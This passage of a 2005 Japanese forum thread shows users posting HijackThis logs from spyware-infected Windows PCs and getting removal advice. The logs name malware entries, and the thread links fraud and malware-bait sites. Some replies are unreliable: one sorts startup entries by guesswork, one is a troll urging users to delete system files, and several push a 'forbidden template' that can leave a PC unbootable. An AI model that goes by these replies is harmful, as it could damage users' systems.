O16 - DPF: {0000000A-0000-0010-8000-00AA00389B71} - http://download.microsoft.com/download/d/4/4/d446e8a9-3a86-4b59-bb19-f5bd11b40367/wmavax.CAB
O16 - DPF: {00001016-A15C-11D4-97A4-0050BF0FBE67} (NetmarbleStarter16 Class) - http://www.netmarble.net/game/nmstarter/NMStarter16.cab
O16 - DPF: {166B1BCA-3F9C-11CF-8075-444553540000} (Shockwave ActiveX Control) - http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
O16 - DPF: {2931566C-B8A6-46C5-BF4D-E6AB9251E953} (Nexon Package Manager Control) - http://www.nexon.co.jp/JP/f/ActiveX/Public/nxpm.cab


541 :530:05/02/24 00:11:57 ID:hY+nP/j2
O16 - DPF: {2B323CD9-50E3-11D3-9466-00A0C9700498} (Yahoo! Audio Conferencing) - http://cs1.chat.yahoo.co.jp/v45/yacscom.cab
O16 - DPF: {3253344D-9980-0010-8000-00AA00389B71} - http://download.microsoft.com/download/0/8/D/08D91A3B-CFF6-45DE-95DF-64415075E344/mpg4sdmo.cab
O16 - DPF: {3334504D-9980-0010-8000-00AA00389B71} - http://download.microsoft.com/download/0/C/8/0C8EDFAB-30BC-4792-898E-2DABE27B2C4D/mp43dmo.CAB
O16 - DPF: {33564D57-0000-0010-8000-00AA00389B71} - http://download.microsoft.com/download/F/6/E/F6E491A6-77E1-4E20-9F5F-94901338C922/wmv9VCM.CAB
O16 - DPF: {33E7E377-FA07-4228-93A6-8A340B768140} (Nexon Package Manager Control (Jp)) - http://www.nexon.co.jp/JP/f/ActiveX/Public/nxpmjp.cab
O16 - DPF: {70A3ED4F-E41D-452F-8D59-0433205A754A} (MypopInstall Control) - http://cdc006.ucast.mypop.jp/ucast/client/install_files/MYPOP.CAB
O16 - DPF: {9F1C11AA-197B-4942-BA54-47A8489BB47F} - http://v4.windowsupdate.microsoft.com/CAB/x86/unicode/iuctl.CAB?38110.923587963
O16 - DPF: {CDA94496-ED6F-4C72-94C8-2C485DC63390} (VCDS Control) - http://vcds-client.nefficient.co.kr/vcds-client/vCDS.CAB
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
O16 - DPF: {FF65677A-8977-48CA-916A-DFF81B037DF3} - http://download.overpro.com/WildApp.cab
>>538
ありがとうございます。
今から読ましていただきます。

542 :ひよこ名無しさん:05/02/24 00:13:06 ID:???
赤い‥

543 :ひよこ名無しさん:05/02/24 00:13:28 ID:???
なかなか素敵かも

544 :たぬたんなりよ(=^u^=):05/02/24 00:34:33 ID:???
>>541
(=^u^=) 重症なり・・・リカバリをお薦めするなり。

545 :ぼるじょあ ◆yBEncckFOU :05/02/24 00:57:49 ID:???
>>541
(・3・) アルェー どうしてそこまでステキになったNO? 多分なおすの無理ですYO

546 :ひよこ名無しさん:05/02/24 01:01:37 ID:???
どの国のエロサイトに行ったの?

547 :ひよこ名無しさん:05/02/24 01:03:10 ID:???
相当な猛者だな・・・

548 :ひよこ名無しさん:05/02/24 01:07:28 ID:???
>>530よ、セーフモードでこいつらをFixだ‥‥自信無いが
F0 - syst>m.ini: Shell=
F0 - R>ystem.ini: Shel>=
F0 - R>ystem.ini: UserInit=
O1 - Hosts: 127.0.0.3 www.greg-tut.com
O1 - Hosts: http://213.159.117.133/dkprogs/hosts.txt
O2 - BHO: (no name) - {0F9561D0-03B2-44a3-89A6-E95E417CBA25} - C:\WINDOWS\cerbmod.dll
O2 - BHO: IDN Helper Object - {118CE65F-5D86-4AEA-A9BD-94F92B89119F} - C:\WINDOWS\DOWNLO~1\CNSMIN~1.DLL
O2 - BHO: (no name) - {CC378B83-9577-44D0-B4F8-0DD965E176FC} - C:\Program Files\eSyndicate\esyn.dll
O4 - HKCU\..\Run: [SysTime] C:\WINDOWS\System32\systime.exe
O4 - HKCU\..\Run: [Bhao] C:\Documents and Settings\おまえの名前?\Application Data\sрrвр.exe
O4 - HKLM\..\Run: [xAkf2DFq.exe] C:\documents and settings\
O8 - Extra context menu item: ⇔ 選択した文字列をマイ キーワードに追加する by mypop - file:///C:/Program%20Files/UCAST/Free2/
O8 - Extra context menu item: ⇔ このページの更新をmypop 2391;通知する by mypop - file:///C:/Program%20Files/UCAST/Free2/
O15 - Trusted Zone: *.clickspring.ne
O15 - Trusted Zone: *.mt-download.com
O15 - Trusted Zone: *.my-internet.info
O15 - Trusted Zone: *.searchmiracle.com
O15 - Trusted Zone: *.skoobidoo.com
O15 - Trusted Zone: *.slotchbar.com
O15 - Trusted Zone: *.windupdates.com
O15 - Trusted Zone: *.ysbweb.com
O16 - DPF: {FF65677A-8977-48CA-916A-DFF81B037DF3} - http://download.overpro.com/WildApp.cab

549 :ひよこ名無しさん:05/02/24 04:51:58 ID:???
あなたが抗ウイルスのスキャナを使用しないように見えます。
あるいは、あなたのスキャナは活発ではありません。
抗ウイルスのスキャナだけが新しいウィルスからあなたを保護することができます。
よい抗ウイルスのスキャナをここに捜すことができます。
活発なファイアウォールはあなたのシステム上で見つかりませんでした。
あるいは、使用するファイアウォールは私たちに知られていません。
身につける場合?ダウンロードするべきファイアウォールを使用しまた、
1つをインストールして、ウィンドウxpを活性化してください。1つを所有してください。
質問を得たか、私たちに私たちのデータ・ベースに使用するファイアウォールを
加えてほしい場合に備えて、私たちのフォーラムで私たちと連絡をとってください。


550 :ひよこ名無しさん:05/02/24 05:00:41 ID:???
>>549
     _____
   /。    \
  /        \
 / ┏━━━━━┓   
 |  ┃ ● |● |
 |  ┃ | \__/| |  
 \┃ \■__ / |     え?
   \        /

551 :ひよこ名無しさん:05/02/24 06:39:08 ID:???
>>530=>>539-541
うっわぁ…!! ものすごいことになってるな。
みんながリカバリーと言うんだから、試しにこのスレの
禁断のテンプレ>>12-19を実行して下さい。
そして、リカバリーするのですよ。

552 :ひよこ名無しさん:05/02/24 06:40:17 ID:???
工エエェェ(´д`)ェェエエ工

553 :ひよこ名無しさん:05/02/24 10:21:50 ID:???
久々に【アダルトサイト被害対策の部屋】覗きに行ったら、
IE6_SP2用のInternet Explorer関連レジストリの完全なリセット作ったってよ!
XP_SP2の人にはIE6_SP2は、単体でインストール出来ないから便利になったな
ぶっ壊れているやつも取り敢えずこれで直るかもよ
推奨する使用方法は、既に壊れていて何も出来なくなっている人と、
スパイウェアを除去後にもIEの不具合が残っている人
http://www.higaitaisaku.com/cleanfixreg.html

本当は、誰かが素のIE6_SP2のレジストリを上げといてくれれば、
それで上書きすればいいんだけどね
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer
正常な内にまともなレジストリをバックアップしとけよ!

554 :ひよこ名無しさん:05/02/24 15:15:21 ID:k56LjBQ4
現在ギコナビからの閲覧なんですが
昨日まではスレッド内のリンククリックでIEが開きリンク先のページが表示されていたのですが
今日色々とWEBをIEにて閲覧して回ったあとからギコナビでリンククリックをしても
IEは開くのですがアドレスバーになにも表示されず白紙のままになります
そのまま更新を押しても何も変わらず
デスクトップからIEを起動させ何らかのページを表示させた状態でのみ
リンククリックでページの表示が出来ます。
どうすれば元のようにギコナビからIEでページの表示が出来るようになりますか?
XPSP2 IE6.0 ギコナビで開いたIEはヘルプやバージョン情報もクリックしても何も出ません
よろしくおねがいします

555 :ひよこ名無しさん:05/02/24 15:16:46 ID:???
>>554
テンプレ嫁河童

556 :ひよこ名無しさん:05/02/24 15:38:35 ID:???
>>554
うひょ!スレ違いなんてはじめてみた!

557 :ひよこ名無しさん:05/02/24 15:56:55 ID:???
ああ スレ違いね
自己解決しました どうもアリガト低脳ども

558 :530:05/02/24 16:41:34 ID:P65/F+mA
やっぱりリカバリですか・・

最後にセーフモードでやってみてもうだめだったらリカバリします。。

559 :ひよこ名無しさん:05/02/24 16:57:54 ID:???
>>558
ウィルスです

560 :ひよこ名無しさん:05/02/24 17:00:11 ID:???
>>558
回線切れよ
友達にウィルスばら撒いてるぜ

561 :ひよこ名無しさん:05/02/24 18:19:27 ID:VJH0uNe4
tp://www.tiduru.sytes.net/img-box/img20040727015957.jpg
ヤフー掲示板でうっかりこれを踏んだら、エロ画像が出てきて、
その後デスクトップになにかショートカットが3つくらい出てきました。
あと、デスクトップ上に「serch the web」とか書いてあるものが常駐してます。
PC再起動するとなにかエラーメッセージが出てきます。
これはどうすれば良いでしょうか?どなたか助けてください!


562 :ひよこ名無しさん:05/02/24 18:30:32 ID:???
>>561
ダークロリータ、有害

ダークロリータ解説サイト
ttp://foffo-gunkanmaki.hp.infoseek.co.jp/mini/20040901.html

563 :ひよこ名無しさん:05/02/24 18:34:19 ID:???
うっかり踏んだやつ貼ってるヤシはマジでしね

564 :ひよこ名無しさん:05/02/24 19:34:07 ID:eSk25wq/
某アイドルの個人情報流出
http://news19.2ch.net/test/read.cgi/news/1109238214/1

565 :ひよこ名無しさん:05/02/24 19:38:18 ID:???
>>530


根性みせろ俺達がついてるぞ!!!!!!

566 :530:05/02/24 19:55:06 ID:P65/F+mA
禁断のテンプレ試してみました。

すみませんがノートン反応とかウイルス反応してますか?
こちらじゃわからなくて・・

567 :ひよこ名無しさん:05/02/24 20:09:13 ID:???
>>566
禁断のテンプレはネタだよ、ウィルスは全部残る。

568 :たぬたんなりよ(=^u^=):05/02/24 20:29:34 ID:???
(=^u^=) まだがんばってるなりね

569 :たぬたんなりよ(=^u^=):05/02/24 20:54:41 ID:???
>>530
(=^u^=) 厳しいと思うなりが一応やってみるなりか?

    HijackThis以外のウィンドウをすべて閉じ、
    エントリにチェックを入れてFix後、PCを再起動するなり。

O1 - Hosts: 127.0.0.3 www.greg-tut.com
O1 - Hosts: http://213.159.117.133/dkprogs/hosts.txt
O2 - BHO: (no name) - {0F9561D0-03B2-44a3-89A6-E95E417CBA25} - C:\WINDOWS\cerbmod.dll
O2 - BHO: IDN Helper Object - {118CE65F-5D86-4AEA-A9BD-94F92B89119F} - C:\WINDOWS\DOWNLO~1\CNSMIN~1.DLL
O2 - BHO: (no name) - {CC378B83-9577-44D0-B4F8-0DD965E176FC} - C:\Program Files\eSyndicate\esyn.dll
O4 - HKLM\..\Run: [xAkf2DFq.exe] C:\documents and settings\
O4 - HKLM\..\Run: [SysTime] C:\WINDOWS\System32\systime.exe
O4 - HKCU\..\Run: [Bhao] C:\Documents and Settings\
O4 - HKCU\..\Run: [SysTime] C:\WINDOWS\System32\systime.exe
O15 - Trusted Zone: *.clickspring.net
O15 - Trusted Zone: *.mt-download.com
O15 - Trusted Zone: *.my-internet.info
O15 - Trusted Zone: *.searchmiracle.com
O15 - Trusted Zone: *.skoobidoo.com
O15 - Trusted Zone: *.slotchbar.com
O15 - Trusted Zone: *.windupdates.com
O15 - Trusted Zone: *.ysbweb.com
O16 - DPF: {70A3ED4F-E41D-452F-8D59-0433205A754A} (MypopInstall Control) - http://cdc006.ucast.mypop.jp/ucast/client/install_files/MYPOP.CAB
O16 - DPF: {FF65677A-8977-48CA-916A-DFF81B037DF3} - http://download.overpro.com/WildApp.cab

IEを起動せずコントロールパネル→インターネットオプションからテンプレ>>2の1)2)

570 :たぬたんなりよ(=^u^=):05/02/24 20:55:54 ID:???
続きなり♪

そして関連ファイルを削除するなり。
念の為にゴミ箱に10日位は残しておくなり。

01エントリが復活する場合は以下を実行するなり。
hostsファイルの削除
http://www.higaitaisaku.com/hosts.html

CoolWebSearch Ad-Aware SE Spybot1.3 をセーフモードで実行。

最後に IE 関連レジストリの完全なリセット
http://www.higaitaisaku.com/cleanfixreg.html

571 :ひよこ名無しさん:05/02/24 21:06:01 ID:/IFY9qqo
【漢専用】Regseeker 二代目【ばっさり上等】
http://pc5.2ch.net/test/read.cgi/win/1106975895/

572 :ひよこ名無しさん:05/02/24 21:08:43 ID:???
       /                    .\
     /                       .\
 \ /                          \ /
   \      ___________     . /
    \   ./                \   /
     | \/                   \/...|
     |  |                       |  |
     |  |                       |  |
  .._ |_|                       |_|_..
     |  |     さあ‥ 逝こうか‥‥     |  |
     |  |                       |  |
     |  |                       |  |
     |  |                       |  |
     |  |/                   ..\|  |
     |  |                       |  |
   .._|/|      _ _ _ _ _ _ _ _     ...|\|_
  / ..|  |   _−_−_−_−_− _   |  |  \
     |  |/_/━ ━ ━ ━ ━ ━\_\|  |
   .._| /_/━ ━ ━ ━ ━ ━ ━ \_\.|_
     /_/━  ━  ━  ━  ━  ━  ━ \_\
   /  /━  ━  ━  ━  ━  ━  ━\  \

573 :ひよこ名無しさん:05/02/24 21:09:53 ID:???
ばっさり上等カコイイ

574 :ひよこ名無しさん:05/02/24 21:15:08 ID:iacKgmXL
http://0721partner.com/?mwr3ntax

このサイトでエンター押した後に1、8歳以上確認約款ダイアログが出てきて、そこで「キャンセル」を押すと
もう一度「18歳以上の約款確認者か確認しています!」ってダイアログが出てきます。
そのダイアログの中は「OK」しか無くてクリックすると入会したことになるんだけど
これってワンクリック詐欺業者?


575 :ひよこ名無しさん:05/02/24 21:16:58 ID:???
その通り
無視

576 :530:05/02/24 21:25:35 ID:P65/F+mA
変なアイコンも出なくなり、HPもSONYに戻り異常も消えました。
皆さん優しい人ばかりで、本当に助かりました。
まだ完全に直ったわけではないので、こまめにチェックしていきます。
本当にありがとうございました。

577 :ひよこ名無しさん:05/02/24 21:41:43 ID:???
>>576
いいえ(^^^

578 :ひよこ名無しさん:05/02/24 21:48:18 ID:2W4q7res
ME です。(2000)
Orgasmというショートカットがデスクトップにでてきて、消しても消してもまたでてきます。
その、本体を消そうとすると、windowsが使っています。とでてしまいます。
どうすればよろしいでしょうか?

579 :ひよこ名無しさん:05/02/24 21:51:19 ID:???
>>578
デスクトップの掃除を日課にしよう

580 :ひよこ名無しさん:05/02/24 21:52:59 ID:2W4q7res
579
そうすれば消えるんですか?なるべく、瞬時に消したいんですけど…

581 :ひよこ名無しさん:05/02/24 21:57:24 ID:???
>>530
禁断のテンプレ…本当に試したのなら、深刻な問題が発生するはずだぞ。
最悪PCが起動できなくなってしまうんだぞ。
本当にやったのなら、どれとどれを試した?
(たぶん、>>14>>15だけだろ)

>>567
禁断のテンプレの目的は、ウィルスの活動を止めること。
だから、ウィルスは全部残ると言ってるお前、正しい。

では、>>530
しばらく様子みて、まだ何か気付いた事があれば
ここに来ればいい。
ココには、私のような変な人から、たぬたんのように良い人もいますので。

582 :ひよこ名無しさん:05/02/24 22:16:56 ID:???
>>578

>>2-

583 :ひよこ名無しさん:05/02/24 22:17:04 ID:???
>>581
禁断のテンプレの作者さんですか?

584 :530:05/02/24 22:17:17 ID:P65/F+mA
>>581
>>16を試してみました。

またおかしいことがありましたらご報告さしてもらいます。
では。

585 :ひよこ名無しさん:05/02/24 22:20:54 ID:???
>>124>>16を試してるね、人を引きつける文面なのかな?

586 :ひよこ名無しさん:05/02/24 22:22:53 ID:???
>>584
ちゃんと射精できた?今日はいっぱい釣れたね。

587 :ひよこ名無しさん:05/02/24 22:24:16 ID:A3RDsplq
俺、毎日エロサイトに行くのでウィルスやスパイウェアに、過敏になって(なり過ぎて)います。
毎日、IEオプションのクッキーと一時ファイルの削除を、やってしまう癖が付いちゃいました。
そして、終了前にMsconfigのスタートアップに、怪しい項目が登録されていないか
チェックしてしまう癖も付いてしまいました。
しかも、毎週末必ずPCをセーフモードで起動して、アンチウィルス・アンチスパイウェアで
PCの完全チェックもしてしまう癖もつきました。
OSはWindowsの98SE・使用ブラウザはIE6のSP1です。
WindowsUpdateも済ませておりますし、セキュリティソフトも最新の状態です。
ブラウザのセキュリティも「高」(に匹敵するレベルに自分でカスタマイズしている)にしています。
2chには、専用ブラウザを使って書き込んでいます。

今からHijackThisのLOGを貼ります。

588 :485:05/02/24 22:24:47 ID:5WhdJEl5
>>505
だいぶ遅れましたけどセーフモードで実行してみました。
REGEDIT4

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\run]
"ScanRegistry"="c:\\windows\\scanregw.exe /autorun"
"TaskMonitor"="c:\\windows\\taskmon.exe"
"SystemTray"="SysTray.Exe"
"IrMon"="IrMon.exe"
"FMモバイルスイッチャー"="C:\\Program Files\\FUJITSU\\FMモバイルスイッチャー\\ToolBar.exe -StartToolBar"
"internat.exe"="internat.exe"
"LoadPowerProfile"="Rundll32.exe powrprof.dll,LoadCurrentPwrScheme"
"FujiXeroxPrinTray"="PrinTray.exe"
"AlpsPoint"="C:\\Progra~1\\Apoint\\Apoint.exe"
"LoadBtnHnd"="C:\\Program Files\\Common Files\\Fujitsu Shared\\BtnHnd.exe"
"ChgRes"="c:\\fjuty\\chgres\\chgres.exe /NOTE"
"ChgResDel"="C:\\WINDOWS\\rundll.exe setupx.dll,InstallHinfSection DefaultInstall 132 c:\\fjuty\\chgres\\chgres.inf"
"LexStart"="Lexstart.exe"
"LoadQM"="loadqm.exe"
"RavTimer"="C:\\PROGRAM FILES\\RISING\\RAV\\RavTimer.exe"
"RavMon"="C:\\PROGRAM FILES\\RISING\\RAV\\RavMon.exe"
"ccenter"="C:\\Program Files\\rising\\Rav\\CCenter.exe"
"Kernel32"="C:\\WINDOWS\\SYSTEM\\Kernel.dll"
"QuickTime Task"="\"C:\\WINDOWS\\SYSTEM\\QTTASK.EXE\" -atboottime"
"SysTime"="C:\\WINDOWS\\SYSTEM\\systime.exe"

589 :587:05/02/24 22:25:09 ID:A3RDsplq
Logfile of HijackThis v1.98.2
Scan saved at 22:05:50, on 05/02/24
Platform: Windows 98 SE (Win9x 4.10.2222A)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\SYSTEM\KERNEL32.DLL
C:\WINDOWS\SYSTEM\MSGSRV32.EXE
C:\WINDOWS\SYSTEM\MPREXE.EXE
C:\WINDOWS\SYSTEM\mmtask.tsk
C:\PROGRAM FILES\MCAFEE.COM\VSO\MCVSRTE.EXE
C:\WINDOWS\SYSTEM\MSTASK.EXE
C:\WINDOWS\EXPLORER.EXE
C:\WINDOWS\SYSTEM\SYSTRAY.EXE
C:\WINDOWS\SYSTEM\IMEJPMGR.EXE
C:\WINDOWS\TASKMON.EXE
C:\PROGRAM FILES\MCAFEE.COM\VSO\MCVSSHLD.EXE
C:\PROGRAM FILES\MCAFEE.COM\AGENT\MCAGENT.EXE
C:\PROGRAM FILES\MCAFEE.COM\PERSONAL FIREWALL\MPFTRAY.EXE
C:\PROGRAM FILES\MCAFEE.COM\VSO\MCVSESCN.EXE
C:\WINDOWS\SYSTEM\INTERNAT.EXE
C:\WINDOWS\SYSTEM\WMIEXE.EXE
C:\PROGRAM FILES\MCAFEE.COM\PERSONAL FIREWALL\MPFAGENT.EXE
C:\WINDOWS\SYSTEM\RNAAPP.EXE
C:\WINDOWS\SYSTEM\TAPISRV.EXE
C:\WINDOWS\SYSTEM\DDHELP.EXE
C:\WINDOWS\デスクトップ\HIJACKTHIS\HIJACKTHIS.EXE

590 :587:05/02/24 22:26:17 ID:A3RDsplq
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\PROGRAM FILES\ADOBE\ACROBAT 5.0\READER\ACTIVEX\ACROIEHELPER.OCX
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHELPER.DLL
O3 - Toolbar: ラジオ(&R) - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\SYSTEM\MSDXM.OCX
O3 - Toolbar: McAfee VirusScan - {BA52B914-B692-46c4-B683-905236F6F655} - C:\PROGRAM FILES\MCAFEE.COM\VSO\MCVSSHL.DLL
O4 - HKLM\..\Run: [SystemTray] SysTray.Exe
O4 - HKLM\..\Run: [ScanRegistry] c:\windows\scanregw.exe /autorun
O4 - HKLM\..\Run: [TaskMonitor] c:\windows\taskmon.exe
O4 - HKLM\..\Run: [VSOCheckTask] "C:\PROGRA~1\MCAFEE.COM\VSO\MCMNHDLR.EXE" /checktask
O4 - HKLM\..\Run: [VirusScan Online] "C:\PROGRA~1\MCAFEE.COM\VSO\mcvsshld.exe"
O4 - HKLM\..\Run: [MCAgentExe] C:\PROGRA~1\MCAFEE.COM\AGENT\mcagent.exe
O4 - HKLM\..\Run: [MCUpdateExe] C:\PROGRA~1\MCAFEE.COM\AGENT\MCUPDATE.EXE
O4 - HKLM\..\Run: [LoadPowerProfile] Rundll32.exe powrprof.dll,LoadCurrentPwrScheme
O4 - HKLM\..\Run: [MPFExe] C:\PROGRA~1\MCAFEE.COM\PERSON~1\MPFTRAY.EXE
O4 - HKLM\..\Run: [internat.exe] internat.exe
O4 - HKLM\..\RunServices: [McVsRte] C:\PROGRA~1\MCAFEE.COM\VSO\mcvsrte.exe /embedding
O4 - HKLM\..\RunServices: [SAService] C:\CyberTrio\SaService.exe
O4 - HKLM\..\RunServices: [SchedulingAgent] mstask.exe
O12 - Plugin for .mpg: C:\PROGRA~1\INTERN~1\PLUGINS\npqtplugin3.dll
O12 - Plugin for .png: C:\PROGRA~1\INTERN~1\PLUGINS\npqtplugin6.dll
O16 - DPF: {4ED9DDF0-7479-4BBE-9335-5A1EDB1D8A21} (McAfee.com Operating System Class) - http://bin.mcafee.com/molbin/shared/mcinsctl/jp/4,0,0,84/mcinsctl.cab
O16 - DPF: {BCC0FF27-31D9-4614-A68E-C18E1ADA4389} (DwnldGroupMgr Class) - http://bin.mcafee.com/molbin/shared/mcgdmgr/jp/1,0,0,21/mcgdmgr.cab

関係無いようですが、起動時の残りリソースは65%です。

591 :485:05/02/24 22:27:54 ID:5WhdJEl5
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\run\OptionalComponents]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\run\OptionalComponents\MSFS]
"Installed"="1"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\run\OptionalComponents\MAPI]
"NoChange"="1"
"Installed"="1"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\run\OptionalComponents\IMAIL]
"Installed"="1"

他にもRun-やRunOnceなんかのカテゴリーもありましたけど
そっちも表示した方がいいでしょうか?

592 :ひよこ名無しさん:05/02/24 22:29:57 ID:???


593 :485:05/02/24 22:31:41 ID:5WhdJEl5
タイミングが悪かったですね…。
>>588 >>591が私の、
多分>>587 >>589-590が587さんの分です

594 :ひよこ名無しさん:05/02/24 22:34:03 ID:???
>>588
うわっ・・・!!
ま、とりあえずだな、カンで良い物と悪い物を言っておくぞ。
良い=○ 悪い=× 分からん=△

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\run]
○"ScanRegistry"="c:\\windows\\scanregw.exe /autorun"
○"TaskMonitor"="c:\\windows\\taskmon.exe"
○"SystemTray"="SysTray.Exe"
○"IrMon"="IrMon.exe"
○"FMモバイルスイッチャー"="C:\\Program Files\\FUJITSU\\FMモバイルスイッチャー\\ToolBar.exe -StartToolBar"
○"internat.exe"="internat.exe"
○"LoadPowerProfile"="Rundll32.exe powrprof.dll,LoadCurrentPwrScheme"
○"FujiXeroxPrinTray"="PrinTray.exe"
△"AlpsPoint"="C:\\Progra~1\\Apoint\\Apoint.exe"
○"LoadBtnHnd"="C:\\Program Files\\Common Files\\Fujitsu Shared\\BtnHnd.exe"
△"ChgRes"="c:\\fjuty\\chgres\\chgres.exe /NOTE"
△"ChgResDel"="C:\\WINDOWS\\rundll.exe setupx.dll,InstallHinfSection DefaultInstall 132 c:\\fjuty\\chgres\\chgres.inf"
×"LexStart"="Lexstart.exe"
×"LoadQM"="loadqm.exe"
×"RavTimer"="C:\\PROGRAM FILES\\RISING\\RAV\\RavTimer.exe"
×"RavMon"="C:\\PROGRAM FILES\\RISING\\RAV\\RavMon.exe"
×"ccenter"="C:\\Program Files\\rising\\Rav\\CCenter.exe"
×"Kernel32"="C:\\WINDOWS\\SYSTEM\\Kernel.dll"
×"QuickTime Task"="\"C:\\WINDOWS\\SYSTEM\\QTTASK.EXE\" -atboottime"
×"SysTime"="C:\\WINDOWS\\SYSTEM\\systime.exe"

そしてだな、お前に悪い知らせがある。
>"Kernel32"="C:\\WINDOWS\\SYSTEM\\Kernel.dll"
これ、VBS_REDLOF.A

595 :ひよこ名無しさん:05/02/24 22:34:48 ID:???
キチガイ降臨中?

596 :587:05/02/24 22:36:56 ID:A3RDsplq
>588>591
気にしない気にしない。

俺のほうより、485の方を見てくれ。

597 :ひよこ名無しさん:05/02/24 22:39:20 ID:???
>>587
そんで何の不具合があるの?

598 :587:05/02/24 22:41:19 ID:A3RDsplq
>>597
だから、少し心配なんです。

599 :ひよこ名無しさん:05/02/24 22:42:39 ID:???
>>598
悪いところはないよ、システムリソース増やしとけ
http://homepage2.nifty.com/winfaq/sysres.html

600 :ひよこ名無しさん:05/02/24 22:44:40 ID:???
>>485
"Kernel32"="C:\\WINDOWS\\SYSTEM\\Kernel.dll"
こいつは削除して再起動しろよ

601 :ひよこ名無しさん:05/02/24 22:46:07 ID:???
禁断のテンプレ考えた張本人だけど、ちょっとだけアドバイス。
まず、>587=>589-590
見たところ、特に以上は無いですよ。あまり過敏になりすぎると、
体に良くないよ。
それから、
>588=485
もし、みんなが「リカバリ」だの「OS再インスコ」だの言ってきたら、
手遅れという意味なので、セーフモードでPCを起動して、
このスレの禁断のテンプレの>14-18を一度に実行。

602 :ひよこ名無しさん:05/02/24 22:46:55 ID:???
工エエェェ(´д`)ェェエエ工

603 :ひよこ名無しさん:05/02/24 22:49:01 ID:???
>>600
だらか!
RunのKernel32を削除して再起動してもすぐ復活するぞ。

604 :ひよこ名無しさん:05/02/24 22:50:08 ID:???
あーヒマだ

605 :485:05/02/24 22:56:29 ID:5WhdJEl5
>>594
×ついてるのは全部消しちゃって大丈夫なんでしょうか
VBS〜って、ぐぐったら厄介なウイルスだったんですね。

606 :594:05/02/24 22:58:15 ID:???
>>605
あくまでも俺のカンだ。
俺よりもっと詳しい人が現われるまで、待ってろ。

607 :ひよこ名無しさん:05/02/24 22:58:27 ID:???
荒らしが答えてるからまた明日来たほうがいいよ。

608 :ひよこ名無しさん:05/02/24 23:00:32 ID:???
すいません。質問させてください。
昨日の6ってどういうこでしょうか?
今日の8とか今日の10ならわかるんですけど・・・。
色々試したけどダメでした。
宜しくお願いします。

609 :ひよこ名無しさん:05/02/24 23:01:10 ID:???
ここのスパイウェア対策とかウイルス対策の項目を見てみればどう?
ttp://outbreak.kt.fc2.com/index.html

610 :587:05/02/24 23:07:26 ID:A3RDsplq
>>599
本当ですか?
本当にウィルスとかは大丈夫なんですか?
あとリソースのほうは、アンチウィルスとファイアーウォールをアンインストールすれば、
増やせますね。

>>588
OSwindows98ですよね?
それなら、MS−DOSモードというのがあるので、
スタート→終了→MS-DOSモードで再起動
MS-DOSモードで起動したら、レジストリの復元で問題が起きる前の日付を
選んで(一番古い日付は不可だよ)、再起動。
レジストリの復元のやり方は、scanreg /restoreと入力してEnterキーを押す。
gと/の間に半角スペースを入れてね。

611 :ひよこ名無しさん:05/02/24 23:22:58 ID:???
このスレの人たち、悪人だから騙されてはいかんぞ。
>>594はウソを付いている。
○の付いた物はウィルスで×または△がOSの大事なファイルだぞ。
とりあえずc:\windows\wscript.exeがあったら削除して再起動しろ。

612 :ひよこ名無しさん:05/02/25 00:48:04 ID:???
>>608(参考)
http://gazou.on.arena.ne.jp/kiso/password.htm

すれ違いだけに、こんなに相手してもらえるなんて
めったにないぞ。スレ住人に迷惑かけるな。

613 :ひよこ名無しさん:05/02/25 01:27:11 ID:w0nPyR4t
はじめまして。どうかアドバイスおねがいします。
http://www.cho-ii.com/?id=152
↑のサイトの画像をクリックしたところ
テンプレ6の警視庁のページの、「パソコン画面の例」という
画面とほぼ同じ物が出てきました。
他のテンプレを読んだところ、完全に無視すれば良いと分かったのですが
↑のサイトのバージョンには業者の住所や、メールアドレスなんかが書かれてありました。
気付かなかったのですが、利用規約もありました。
入会確認の画面も出て来てません。画像を一回クリックしただけです。
支払い義務はあるのでしょうか?それとも完全無視で良いのでしょうか?


614 :ひよこ名無しさん:05/02/25 01:32:27 ID:???
>>613
完全無視

615 :613:05/02/25 01:43:12 ID:w0nPyR4t
>>614さん
ありがとうございます。
やはり完全無視で良いんですか。
ただこの前、偽の請求が裁判所が絡んできて
結果本当の請求になったと言うのをテレビで見て、心配になったもので…
どなたかアドバイス宜しくお願いします。

616 :ひよこ名無しさん:05/02/25 01:51:18 ID:???
>>615
裁判所からの簡易裁判の事実確認の封書が届いたら、
名誉毀損と不実記載で原告と裁判所を民事で逆提訴して
金をふんだくってやらないとダメだよ。

617 :ひよこ名無しさん:05/02/25 02:05:54 ID:???
>>615
簡易裁判の場合は無視したら認めたことになるので注意。

618 :ひよこ名無しさん:05/02/25 02:11:29 ID:???
>>615
それとワンクリックサイトは違うんじゃないのかな?
ワンクリックサイトでググれば対処法のサイトが出てくるよ

619 :613:05/02/25 02:35:20 ID:w0nPyR4t
みなさん、ありがとうございます。
サギゼロなどでワンクリックサイトの勉強をしてみました。
それで気付いたのですが、「入会しました」と言う画面は出てきましたが
「入会しますか」と言う確認の画面が無かったり
利用規約を読まなくても(ページを通らなくても)先に進めたので
ワンクリックサイトと言うことで宜しいでしょうか?

あと、小額訴訟についても読んでみた所、裁判自体が1日で終わる上
普通に対応すれば大丈夫と、対処法も書いてありました。

620 :ひよこ名無しさん:05/02/25 02:42:44 ID:???
>>619
そういうことだ。かしこくなったな。乙。

621 :ひよこ名無しさん:05/02/25 02:56:42 ID:???
>>615
名誉毀損は無理だろ・・・。

622 :608:05/02/25 04:18:46 ID:???
>>612
失礼しました。
